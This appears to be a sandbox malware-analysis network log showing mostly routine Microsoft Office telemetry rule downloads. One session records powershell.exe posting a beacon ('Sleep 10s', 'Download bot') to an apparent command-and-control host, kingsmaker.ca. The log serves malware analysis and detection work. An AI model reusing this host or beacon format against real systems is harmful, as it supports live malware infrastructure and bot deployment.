                                                                                                                            2024-11-29 07:31:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            64192.168.2.54978613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:05 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:05 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                            x-ms-request-id: 3ecdff04-701e-003e-1903-4279b3000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073105Z-174f7845968px8v7hC1EWR08ng0000000zyg0000000019s0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            65192.168.2.54978713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:05 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:05 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                            x-ms-request-id: 09dbda49-a01e-003d-2d45-4098d7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073105Z-174f78459685m244hC1EWRgp2c0000000zcg000000009cuy
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            66192.168.2.54978913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:06 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:05 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                            x-ms-request-id: 91facc7f-401e-0064-1f3e-4054af000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073105Z-174f7845968xlwnmhC1EWR0sv80000000zhg000000000tg4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            67192.168.2.54978813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:06 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:05 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                            x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073105Z-174f7845968l4kp6hC1EWRe8840000000zx000000000330e
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:06 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            68192.168.2.54979013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:06 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:06 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                            x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073106Z-174f7845968nxc96hC1EWRspw80000000zdg000000002de3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            69192.168.2.549791104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:05 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 69
                                                                                                                            2024-11-29 07:31:05 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                                                            2024-11-29 07:31:06 UTC994INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:06 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f9I7xPQT0p87YS0dmk%2Fo2J2Jgezl7OCi5jWIj7vM2p3DKZd6P18XN3BgSa6sii3geUQagiPC7B38vk55UJCBeLJdYBLlid0Ueau0bFlmsLY7WLTV2SZdD8UO6nd9tRimBuHbqyd96jdd"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=38686&min_rtt=1013&rtt_var=24128&sent=19585&recv=9576&lost=0&retrans=0&sent_bytes=27536048&recv_bytes=301876&delivery_rate=47135761&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e56b8cb91851-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1664&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1012&delivery_rate=1663817&cwnd=214&unsent_bytes=0&cid=491c43ea558848aa&ts=1021&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            70192.168.2.54979213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:07 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:07 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:07 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                            x-ms-request-id: 84052cd8-a01e-000d-592e-41d1ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073107Z-174f7845968pght8hC1EWRyvxg00000002rg000000006ge8
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            71192.168.2.54979313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:07 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:07 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:07 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 485
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                            x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073107Z-174f7845968pf68xhC1EWRr4h80000000zyg000000001fv1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:07 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            72192.168.2.54979513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:07 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:08 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:08 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 470
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                            x-ms-request-id: 80aee034-201e-00aa-143d-403928000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073108Z-174f7845968n2hr8hC1EWR9cag0000000z90000000004g3w
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:08 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            73192.168.2.54979413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:08 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:08 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:08 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 411
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                            x-ms-request-id: b10bd460-301e-0096-2d05-41e71d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073108Z-174f7845968psccphC1EWRuz9s0000000zx00000000031vq
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:08 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
